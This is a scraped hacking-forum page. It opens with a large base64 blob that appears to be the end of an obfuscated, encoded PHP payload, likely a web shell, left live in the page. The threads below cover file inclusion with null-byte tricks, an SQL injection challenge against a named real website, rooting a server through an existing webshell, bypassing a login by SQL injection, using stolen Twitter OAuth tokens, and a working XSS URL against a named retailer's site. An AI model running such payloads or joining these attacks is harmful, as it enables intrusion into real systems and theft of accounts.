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'\x29\x29\x20\x29\x20\x3b",".");?>
LFI Help (no replies)
I just tested something local. I use the following code
<?php
$action = $_GET['do'].'.php';
include($action);
And i want to include the file a.html
Normally you would do it like that:
?do=a.html%00
But that doesn't work, I only get this error
Warning: include() [function.include]: Failed opening 'a.html' for inclusion in on line 3
Any ideas?
[MED]CHALLENGE (15 replies)
few days ago I reveiced this site from a frend.
I solved the challange pretty quickly.
now heres the question, will u?
site:
http://www.itpark.am/firm.php?lang=us&id=9
rules:
-solve it with union select or error based(error might be even harder..)
-Pm solution or Post a picture.
Proof:
-union:
-error: (sorry its bit small..photobucket)
Solvers:
-Lolalu0
Have fun and good luck. (u will need it)
Tnx to Net_Spy for sending me this site
so,can you guys help to root it? (4 replies)
hello guys,there is a server and I`ve already got the webshell,the os is linux and kernel version is 2.6.18-92 and i have tried all the exploits on internet but cannt get root of it,any ideas ?
Hi friends (1 reply)
Hi Friends, I am BreakTheSec, Security Researcher and News reporter.
Help to pass my login form (2 replies)
Hi,
I would like to pass this login form with an sql injection.
The SQL Script is:
<?php
if (isset($_POST['inloggen'])){
$sql="SELECT * FROM gebruikers_sitebeheerder WHERE gebruikers_naam='".$_POST['gebruikersnaam']."'";
$result=mysql_query($sql) or die (mysql_error($sql));
while ($rij=mysql_fetch_array($result)) {
if ($rij['gebruikers_naam']!=$_POST['gebruikersnaam']){
}
elseif ($rij['gebruikers_wachtwoord']!=$_POST['wachtwoord']){
}
else{
$_SESSION['gebruikers_id']=$rij['gebruikers_id'];
$_SESSION['naam']=$rij['gebruikers_naam'];
echo '<script>this.location.href="./loggedin.php";</script>';
}
}
}
?>
The script is dutch but here is a quick translation:
gebruikers_sitebeheerder = admin_users
gebruikers_naam = username
gebruikers_wachtwoord = password
gebruikers_id = username_id
naam = name
Please help me to improve this security.
Thanks :)
help with md5 (no replies)
done..
Twitter oauth tokens now what? (2 replies)
so i found a site that was storing 10 twitter usernames, consumer_key, consumer_secret, oauth_token and oauth_token_secret
so i have all this information.... now what?
cam i use it to get on there twitter accounts?
Hacking Sur La Table's Kiosk (1 reply)
So I was perusing around our local Sur La Table and came across this
http://i.imgur.com/LeGpD.jpg
(to the left is a Cisco VoIP phone that it was plugged in to)
Needless to say it caught my attention.
I tried the 3 finger salute, I tried the Windows button, and the windows + D button and I wasn't getting anywhere.
So I started to poke around the menus and all that I had access to was the website.
No URL bar, no right click to open in new window or save as.
So I was wondering how I could get to another website to potentially download an command prompt or something, when I only have access to their website?
Well their website is vulnerable to XSS which allowed me to do a document.location
http://www.surlatable.com/search/searchContainer.jsp?q="><script>document.location='http://google.com';</script>&s=true
as you can see by: http://i.imgur.com/dMGpS.jpg
Another potentional option would have been via their home page, is their ads to their twitter and facebook pages.
So obviosuly they didn't have a whitelist/blacklist of URLs to visit.
